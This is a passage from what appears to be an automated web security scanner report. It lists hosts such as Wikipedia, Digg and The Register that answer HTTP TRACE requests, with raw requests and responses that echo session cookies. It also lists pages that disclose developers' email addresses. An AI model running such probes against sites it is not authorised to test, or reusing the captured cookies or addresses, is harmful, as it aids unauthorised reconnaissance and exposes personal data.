X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<div style="padding:10px 5px 3px 5px">
Image: <input type="file" name="smp_local_blog_footer_img" /><br />
...[SNIP]...

18. TRACE method is enabled previous next
There are 15 instances of this issue:

http://133.xg4ken.com/
http://amch.questionmarket.com/
http://blogs.computerworld.com/
http://bp.specificclick.net/
http://cdn.ttgtmedia.com/
http://digg.com/
http://dna1.mookie1.com/
http://en.wikipedia.org/
http://forms.theregister.co.uk/
http://nir.theregister.co.uk/
http://r.openx.net/
http://rotation.linuxnewmedia.com/
http://secure-au.imrworldwide.com/
http://www.theregister.co.uk/
http://www.widgetserver.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

18.1. http://133.xg4ken.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://133.xg4ken.com
Path:	/

Request

TRACE / HTTP/1.0
Host: 133.xg4ken.com
Cookie: ecee96117679e5f9

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:34 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 133.xg4ken.com
Cookie: ecee96117679e5f9

18.2. http://amch.questionmarket.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6832131f205ced4b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:16:22 GMT
Server: Apache/2.2.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: 6832131f205ced4b; linkjumptest=1; LP=1315138435; CS1=931683-4-2; ES=921286-wME{M-$1
Connection: Keep-Alive

18.3. http://blogs.computerworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.computerworld.com
Path:	/

Request

TRACE / HTTP/1.0
Host: blogs.computerworld.com
Cookie: e8eb0d0e502228cf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:15:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blogs.computerworld.com
Cookie: e8eb0d0e502228cf; PHPSESSID=ad93eb1sjsmavv7lb6dbeo6005; mobify=0; __switchTo5x=100; __unam=8eb1eeb-132345c7bf3-4ee6c456-1; s_pers=%20s_pv%3DBlog%253A%2520Post%253A%2520Happy%2520hackers%2520attack%2520sites%252C%2520s
...[SNIP]...

18.4. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: 84f1702a8d65dded

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 88
Date: Sun, 04 Sep 2011 12:18:44 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: 84f1702a8d65dded; ADVIVA=NOTRACK

18.5. http://cdn.ttgtmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.ttgtmedia.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cdn.ttgtmedia.com
Cookie: cda2392e740fc26d

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:14:48 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n53 ( origin>CONN)
Content-Length: 357
Content-Type: message/http
Vary: Accept-Encoding, User-Agent
Connection: close

TRACE / HTTP/1.1
Host: media.ttgtmedia.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Via: 1.1 lax-agg-n53.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 66.114.50.51
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://cdn.ttgtmedia.com/
Cookie: cda2392e740fc26d
Connection: keep-alive
BIOrigClientAddr: 66.114.50.51

18.6. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: d582292fbb54be5a

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: d582292fbb54be5a; traffic_control=704100000060910000168986600130000020084302a10001%3A300%3A112; d=395f38b022473dc24309acfc392f5d42eb062de1f009d023ac7d013313090643
Connection: Keep-Alive
X-forwarded-for: 50.23.123.10
...[SNIP]...

18.7. http://dna1.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dna1.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: dna1.mookie1.com
Cookie: 345ab8319c728f96

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:11 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dna1.mookie1.com
Cookie: 345ab8319c728f96
Connection: Keep-Alive
DNA_IP: 50.23.123.106

18.8. http://en.wikipedia.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/

Request

TRACE / HTTP/1.0
Host: en.wikipedia.org
Cookie: 241da2829c533f1f

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 14:00:17 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: NONE from sq61.wikimedia.org:3128
X-Cache: MISS from sq59.wikimedia.org
X-Cache-Lookup: NONE from sq59.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: en.wikipedia.org
Cookie: 241da2829c533f1f
Via: 1.0 sq61.wikimedia.org:3128 (squid/2.7.STABLE9)
X-Forwarded-For: 50.23.123.106, 208.80.152.69

18.9. http://forms.theregister.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forms.theregister.co.uk
Path:	/

Request

TRACE / HTTP/1.0
Host: forms.theregister.co.uk
Cookie: 4c6358aaa3e42b4b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:17 GMT
Server: Apache/2.2.16 (Debian) PHP/5.2.6-1+lenny12 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.0
Vary: Host
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: forms.theregister.co.uk
Cookie: 4c6358aaa3e42b4b; cid=; sc=1
X-Forwarded-For: 50.23.123.106
X-Forwarded-Host: forms.theregister.co.uk
X-Forwarded-Server: forms.theregister.co.uk
Connection: Keep-Alive

18.10. http://nir.theregister.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nir.theregister.co.uk
Path:	/

Request

TRACE / HTTP/1.0
Host: nir.theregister.co.uk
Cookie: 748b8a623dfef354

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:56 GMT
Server: Apache/2.2.16 (Debian) mod_apreq2-20090110/2.8.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: localhost:30050
Cookie: 748b8a623dfef354; a=1/119665; c=1/sec.malware.4e636b47; cid=
X-Forwarded-For: 50.23.123.106
X-Forwarded-Host: nir.theregister.co.uk
X-Forwarded-Server: nir.theregister.co.uk
Connection: Keep-Alive

18.11. http://r.openx.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: e23726c91e49798a

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:47:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: e23726c91e49798a; i=fbe566bc-e601-4d14-a2ef-601df1907cf9; p=1315103786
X-Forwarded-For: 50.23.123.106

18.12. http://rotation.linuxnewmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rotation.linuxnewmedia.com
Path:	/

Request

TRACE / HTTP/1.0
Host: rotation.linuxnewmedia.com
Cookie: 54f3aca8327d7fae

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:45 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.17 with Suhosin-Patch proxy_html/3.0.0 mod_ssl/2.2.8 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rotation.linuxnewmedia.com
Cookie: 54f3aca8327d7fae; OAID=4aa6b1edcc28e64e54bc17d476961dba; OAGEO=%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C

18.13. http://secure-au.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-au.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-au.imrworldwide.com
Cookie: cc241ff867973c23

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: cc241ff867973c23; V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8
Host: secure-au.imrworldwide.com

18.14. http://www.theregister.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theregister.co.uk
Path:	/

Request

TRACE / HTTP/1.0
Host: www.theregister.co.uk
Cookie: 4546b2e1c9cb5591

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:12:53 GMT
Server: Apache/2.2.16 (Debian)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.theregister.co.uk
Cookie: 4546b2e1c9cb5591

18.15. http://www.widgetserver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.widgetserver.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.widgetserver.com
Cookie: b4a278b4a0837608

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:16:56 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.widgetserver.com
Cookie: b4a278b4a0837608; __uuc2=cccc38c6c693f3b3ecbb595626e901a4#702c96a0fbd666e3c261a05928ef538d
X-Forwarded-For: 50.23.123.106

19. Email addresses disclosed previous next
There are 85 instances of this issue:

http://blogs.computerworld.com/sites/default/themes/cw_blogs/jquery.cookie.js
http://brazil.kaspersky.com/
http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js
http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js
http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js
https://chat.livechatinc.net/server/js/livechat.js
http://code.google.com/apis/custom-search-ads/index.html
http://devirusare.com/x26amp
http://drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/pb/multimedia/HomePage/jquery.colorbox.js
http://images.google.com/support/bin/answer.py
http://latam.kaspersky.com/
http://lwn.net/Articles/456878/
https://lwn.net/login
https://maps-api-ssl.google.com/maps
http://maps.google.com/maps
http://searchsecurity.techtarget.com/
http://searchsecurity.techtarget.com/digitalguide/images/Editorial/mmimoso-sm.jpg
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400
http://support.kasperskyamericas.com/
http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
http://support.kasperskyamericas.com/corporate/contact-information
http://support.kasperskyamericas.com/corporate/index.html
http://support.kasperskyamericas.com/corporate/live-chat
http://support.kasperskyamericas.com/corporate/mobile-security-7-enterprise-edition
http://support.kasperskyamericas.com/corporate/open-support-case
http://support.kasperskyamericas.com/search/node/xss
http://translate.google.com/
http://usa.kaspersky.com/
http://usa.kaspersky.com/about-us
http://usa.kaspersky.com/about-us/contact-us
http://usa.kaspersky.com/about-us/index.html
http://usa.kaspersky.com/index.html
http://usa.kaspersky.com/node/12354/lightbox2
http://usa.kaspersky.com/node/17007
http://usa.kaspersky.com/node/index.html
http://usa.kaspersky.com/products-services/home-computer-security/index.html
http://usa.kaspersky.com/products-services/home-computer-security/internet-security
http://usa.kaspersky.com/products-services/home-computer-security/mobile-security
http://usa.kaspersky.com/products-services/home-computer-security/pure
http://usa.kaspersky.com/products-services/home-computer-security/tablet-security
http://usa.kaspersky.com/resources/knowledge-center/index.html
http://usa.kaspersky.com/resources/knowledge-center/whitepapers
http://usa.kaspersky.com/search/apachesolr_search
http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
http://usa.kaspersky.com/search/apachesolr_search/index.html
http://usa.kaspersky.com/search/apachesolr_search/xss
http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_30f49f3054e7146ae0b18ae409f59641.js
http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_46af8f68c2630fc751ed0418c2209a90.js
http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_5a9a5376d71ae1646a25b8ca6f6918ac.js
http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_6e74c2e98f0fbe5a3612ed82de36fc7c.js
http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_a4d3545defa8bc26011651e729544348.js
http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js/js_d4f653caa3cf2cb11ec0b051827bac22.js
http://usa.kaspersky.com/store/index.html
http://usa.kaspersky.com/store/kaspersky-store
http://users.techtarget.com/registration/searchsecurity/InlineRegister.page
http://users.techtarget.com/registration/searchsecurity/Register.page
http://wd.sharethis.com/button/buttons.js
http://www.2linkme.com/
http://www.cloudscan.me/feeds/posts/default
http://www.computerworld.com/secure-us.imrworldwide.com/cgi-bin/m
http://www.cve.mitre.org/cgi-bin/cvename.cgi
http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html
http://www.h-online.com/userdb/sso
http://www.itwhitepapers.com/s_code.js
http://www.kaspersky.com/news
http://www.kaspersky.com/productupdates
http://www.kaspersky.com/pure-trial-register
http://www.lexjansen.com/script/niftycube.js
http://www.lexjansen.com/virus/
http://www.networkworld.com/includes/jqlib/exp_nwLib_tail-min.js
http://www.phonefactor.com/whitepaper-search-auth-revolution
http://www.scmagazine.com.au/Scripts/jquery.cookie.js
http://www.sophelle.com/
http://www.sophelle.com/Company/
http://www.sophelle.com/Contact-Us/
http://www.sophelle.com/Contact-Us/thank-you.html
http://www.sophelle.com/How-We-Work/
http://www.sophelle.com/Products/
http://www.sophelle.com/Services/eCommerce-Cross-Channel-Strategy-Operations.html
http://www.sophelle.com/Success-Stories/
http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html
http://www.sophelle.com/Success-Stories/Project-Lifecycle-Re-Engineering.html
http://www.spamfighter.com/RSS20.aspx
http://www.theregister.co.uk/Design/javascript/_.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. http://blogs.computerworld.com/sites/default/themes/cw_blogs/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.computerworld.com
Path:	/sites/default/themes/cw_blogs/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /sites/default/themes/cw_blogs/jquery.cookie.js HTTP/1.1
Host: blogs.computerworld.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ad93eb1sjsmavv7lb6dbeo6005

Response

HTTP/1.1 200 OK
Age: 714
Date: Sun, 04 Sep 2011 12:09:58 GMT
Expires: Sun, 04 Sep 2011 13:09:58 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "284001-1113-49fbc87736f80"
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 00:39:42 GMT
Accept-Ranges: bytes
Content-Length: 4371
nnCoection: close
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

19.2. http://brazil.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://brazil.kaspersky.com
Path:	/

Issue detail

The following email address was disclosed in the response:

newvirus@kaspersky.com

Request

GET / HTTP/1.1
Host: brazil.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Sun, 04 Sep 2011 13:58:37 +0000
Cache-Control: public, max-age=0
ETag: "1315144717-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Content-Type: text/html; charset=utf-8
Content-Length: 45095
Date: Sun, 04 Sep 2011 13:59:59 GMT
X-Varnish: 1163230756 1163227882
Age: 80
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a href="mailto:newvirus@kaspersky.com">
...[SNIP]...

19.3. http://cdn.ttgtmedia.com/rms/ux/javascript/jquery.writeCapture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.ttgtmedia.com
Path:	/rms/ux/javascript/jquery.writeCapture.js

Issue detail

The following email address was disclosed in the response:

noah.sloan@gmail.com

Request

GET /rms/ux/javascript/jquery.writeCapture.js HTTP/1.1
Host: cdn.ttgtmedia.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:26 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n53.panthercdn.com
Cache-Control: max-age=604800
Expires: Sat, 10 Sep 2011 06:11:36 GMT
Age: 108110
Content-Length: 4134
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Wed, 23 Jun 2010 20:43:53 GMT
Connection: keep-alive

/**
* jquery.writeCapture.js
*
* Note that this file only provides the jQuery plugin functionality, you still
* need writeCapture.js. The compressed version will contain both as as single

...[SNIP]...
<noah.sloan@gmail.com>
...[SNIP]...

19.4. http://cdn.ttgtmedia.com/rms/ux/javascript/moScripts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.ttgtmedia.com
Path:	/rms/ux/javascript/moScripts.js

Issue detail

The following email addresses were disclosed in the response:

brian@cherne.net
jack@colorpowered.com

Request

GET /rms/ux/javascript/moScripts.js HTTP/1.1
Host: cdn.ttgtmedia.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:26 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n53.panthercdn.com
Cache-Control: max-age=604800
Expires: Sat, 10 Sep 2011 07:21:12 GMT
Age: 103934
Content-Length: 59169
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Wed, 17 Aug 2011 16:40:42 GMT
Connection: keep-alive

$(document).bind('onclosebody', function () {

   $('.megaMenu').megaMenu({ navLinkPadding: 25 }); // instantiates the mega menus
   $('.articleColumns > ul').uniformHeights(); // create equal height
...[SNIP]...
codeURIComponent(c.substring(b.length+1));break}}}return d}};

/*
* ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
* Copyright (c) 2010 Jack Moore - jack@colorpowered.com
* Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
*/
(function(B,P){var C={transition:"elastic",speed:300,width:false,initialWidth:"600",innerWidth:false,maxWid
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

19.5. http://cdn.ttgtmedia.com/rms/ux/javascript/writeCapture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.ttgtmedia.com
Path:	/rms/ux/javascript/writeCapture.js

Issue detail

The following email address was disclosed in the response:

noah.sloan@gmail.com

Request

GET /rms/ux/javascript/writeCapture.js HTTP/1.1
Host: cdn.ttgtmedia.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:26 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n53.panthercdn.com
Cache-Control: max-age=604800
Expires: Wed, 07 Sep 2011 20:46:05 GMT
Age: 314841
Content-Length: 11224
Content-Type: application/x-javascript
Vary: Accept-Encoding
Last-Modified: Wed, 10 Aug 2011 22:03:13 GMT
Connection: keep-alive

/**
* writeCapture.js v1.0.5
*
* @author noah <noah.sloan@gmail.com>
*
*/
(function($,global){var doc=global.document;function doEvil(code){var div=doc.createElement('div');doc.body.insertBefore
...[SNIP]...

19.6. https://chat.livechatinc.net/server/js/livechat.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/server/js/livechat.js

Issue detail

The following email address was disclosed in the response:

noreply@livechatinc.com

Request

GET /server/js/livechat.js HTTP/1.1
Host: chat.livechatinc.net
Connection: keep-alive
Referer: https://chat.livechatinc.net/licence/1019931/open_chat.cgi?groups=1&s=1&lang=en&dc=SESSdede027f997e7b165588bf3c431a00ec%3Dq25voncnf657rngjhpsai5d5p6%3B%20s_SupportDivison%3DCorporate%2520Support%3B%20has_js%3D1%3B%20s_cc%3Dtrue%3B%20gpv_pageName%3DSupport%2520%257C%2520Corporate%2520Support%2520%257C%2520Open%2520a%2520Support%2520Case%3B%20s_nr%3D1315144694450-New%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utma%3D38548641.275004050.1315144606.1315144606.1315144606.1%3B%20__utmb%3D38548641.10.10.1315144606%3B%20__utmc%3D38548641%3B%20__utmz%3D38548641.1315144606.1.1.utmcsr%3Dusa.kaspersky.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/about-us/contact-us%3B%20__utmv%3D38548641.anonymous%2520user%7C1%3DUser%2520roles%3Danonymous%2520user%3D1%3Bl%3Dhttp%3A//support.kasperskyamericas.com/corporate/live-chat%3Br%3Dundefined%3Bs%3Dundefined
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 178064
Connection: Keep-Alive

(function(a,f){function e(b,d,h){if(h===f&&b.nodeType===1)if(h=b.getAttribute("data-"+d),typeof h==="string"){try{h=h==="true"?!0:h==="false"?!1:h==="null"?null:!c.isNaN(h)?parseFloat(h):ta.test(h)?c.
...[SNIP]...
Request("LiveChat/Offline-form"),$(this).find("input[name=submit]").val(__t("Offline_form_submit_label")),
$("form#offline").submit(function(){var a="",e="",g="",j=!0,q=!0,A=0,w={name:"Visitor",email:"noreply@livechatinc.com"},B="",y=LCC.getURLParam("params");if(y!=""){var y=y.split("&"),u,H;for(H in y)u=y[H].split("="),B+=encodeURIComponent(u[0])+": "+encodeURIComponent(u[1])+"\n"}$("form#offline input, form#offline text
...[SNIP]...

19.7. http://code.google.com/apis/custom-search-ads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/apis/custom-search-ads/index.html

Issue detail

The following email address was disclosed in the response:

test@fastdial.net

Request

GET /apis/custom-search-ads/index.html HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Language,Cookie,Referer
Content-Type: text/html; charset=UTF-8
ETag: "855e821f252656b1f4448b740d0f3226"
Last-Modified: Sun, 04 Sep 2011 06:50:07 GMT
Date: Sun, 04 Sep 2011 14:00:06 GMT
Expires: Sun, 04 Sep 2011 15:00:06 GMT
Cache-Control: public, max-age=3600
X-Content-Type-Options: nosniff
Server: codesite_static_content
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<!DOCTYPE html>

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>
...[SNIP]...
rnal.pageT)window.jstiming.pt=window.external.pageT;})();

var _tocPath_ = '/apis/custom-search-ads/docs/_toc.ezt';
var codesite_token = 'c826d0e513f06115399e054d3df18e5f';
var logged_in_user_email = 'test@fastdial.net';
//-->
...[SNIP]...
<b>test@fastdial.net</b>
|

<a href="/u/test@fastdial.net/"
id="projects-dropdown" onclick="return false;"
>
...[SNIP]...

19.8. http://devirusare.com/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://devirusare.com
Path:	/x26amp

Issue detail

The following email address was disclosed in the response:

geoff@deconcept.com

Request

GET /x26amp HTTP/1.1
Host: devirusare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.9. http://drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/pb/multimedia/HomePage/jquery.colorbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://drh.img.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/pb/multimedia/HomePage/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /DRHM/Storefront/Site/digriv/pb/multimedia/HomePage/jquery.colorbox.js HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740
